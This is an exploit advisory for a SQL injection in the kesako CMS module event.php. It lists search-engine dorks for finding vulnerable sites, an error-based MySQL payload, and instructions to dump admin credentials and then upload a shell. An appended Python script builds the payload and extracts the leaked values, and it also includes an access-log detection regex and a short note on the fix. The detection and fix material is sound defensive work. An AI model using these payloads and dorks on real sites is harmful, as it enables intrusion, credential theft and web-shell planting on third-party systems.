[webapps] - kesako script SQL Injection















EDB-ID: 33492 CVE: N/A OSVDB-ID: N/A
Author: Microsoft-dz Published: 2014-05-24 Verified: Verified
Vulnerable App: N/A


kesako script SQL Injection
  ===================================================================
  ####################################################################
  #.:. Exploit Title : kesako Script Sql Injection #
  # .:. Author : Microsoft-dz #
  #.:. Contact : [ifyoucanbebeme@gmail.com] #
  #.:. Dork : intext:powered by [kesako] inurl:/event.php?id= #
  #.:. Dork 2 : intext:powered by [kesako] # 
  #.:. Tested on : win&linux #
  #.:. Vendor's Website : http://www.kesako.ch/cms/ #
  #.:. Date : [2014/5/19] #
  ####################################################################
  VULNERABILITY
  ##############
  [~] Injection point: www.site.com/modules/event.php?id=[SQL INJECTION]
  [~] The id parameter is used in a numeric context and reaches the MySQL query unfiltered.
  #########
  P0C
  #########
  Type: Error-based MySQL injection (duplicate-entry trick via floor(rand(0)*2) and GROUP BY). The id parameter is numeric, so no quote is needed to break out.
  http://SITE/modules/event.php?id=[SQL INJECTION]
  
  http://site/modules/event.php?id=202 and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
  
  %String_Col% is a placeholder for the expression whose value you want leaked (e.g. version(), user(), or a column of the admin users table; table and column names are not given here). The value comes back inside the MySQL error "Duplicate entry '<value>1' for key 'group_key'", so the application must display database errors for this to work.
  ####################################################################
  1- Get the admin credentials with the query above
  2- Then log in to the admin panel and upload your shell
  Enjoy
  About 20K affected websites
  
  You Can Find The Admin Panel @ http://site/cms/admin
  or http://site/cms/user/
  or http://site/cms/login/
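  Worked example (added here; this is not code from the advisory or from the kesako project): a Python script that builds the PoC above with a chosen expression in place of %String_Col%, pulls the leaked value out of the MySQL duplicate-entry error, and flags the request pattern in web-server access logs. The base URL is the placeholder from the advisory, and the sample response and log lines are constructed, not captured from a real site.

```python
import re
import urllib.parse

# Placeholder host from the advisory; the real target path is /modules/event.php
BASE_URL = "http://site/modules/event.php"


def build_payload(event_id: int, expr: str) -> str:
    """Return the advisory's error-based payload with `expr` substituted for
    the %String_Col% placeholder.

    The inner SELECT evaluates `expr`; concat() glues its value to
    floor(rand(0)*2); GROUP BY on that string over a table with a few rows
    (information_schema.tables always has enough) makes MySQL raise
    "Duplicate entry ... for key 'group_key'". The leaked value rides in the
    error text, so the page must echo database errors for this to work.
    """
    return (
        f"{event_id} and(select 1 from(select count(*),concat("
        f"(select (select {expr}) from `information_schema`.tables limit 0,1),"
        f"floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1"
    )


def build_url(event_id: int, expr: str) -> str:
    """Full request URL, payload percent-encoded the way a browser sends it."""
    return BASE_URL + "?id=" + urllib.parse.quote(build_payload(event_id, expr), safe="")


# rand(0) is seeded, so the colliding group key is always '<value>1'.
# MySQL 5.x names the key 'group_key', 8.x '<group_key>', hence the loose match.
DUP_RE = re.compile(r"Duplicate entry '(.*?)1' for key '<?group_key>?'")


def extract_leaked(response_body: str):
    """Return the leaked value from a response, or None if no error surfaced.

    The error message truncates the key value (64 characters in practice), so
    long results such as password hashes need substring() across requests.
    """
    m = DUP_RE.search(response_body)
    return m.group(1) if m else None


# Detection side: the technique leaves two stable markers in the query string.
# Decode first so %28 / %2A / + do not hide them.
SQLI_SIG = re.compile(r"information_schema|floor\s*\(\s*rand\s*\(", re.IGNORECASE)


def is_error_based_sqli(log_line: str) -> bool:
    """True if an access-log line carries this error-based injection pattern."""
    return bool(SQLI_SIG.search(urllib.parse.unquote_plus(log_line)))


# Constructed sample data (not captured from a real site).
SAMPLE_RESPONSE = (
    "<html><body>Error: Duplicate entry 'kesako@localhost1' for key 'group_key'"
    "</body></html>"
)
SAMPLE_LOGS = [
    '10.0.0.5 - - [24/May/2014:10:01:02 +0000] "GET /modules/event.php?id=202 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [24/May/2014:10:01:09 +0000] "GET '
    + build_url(202, "user()")
    + ' HTTP/1.1" 500 812',
]


if __name__ == "__main__":
    print(build_url(202, "version()"))
    print("leaked:", extract_leaked(SAMPLE_RESPONSE))
    for line in SAMPLE_LOGS:
        print(is_error_based_sqli(line), line[:70])
```

  On the application side the fix is to stop concatenating the parameter: cast id to an integer before it reaches the query, or bind it through a prepared statement, and stop echoing database errors to the client, which removes the channel this technique depends on.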
  #########################################################################
  Tnx: R3Z0Uk4
  



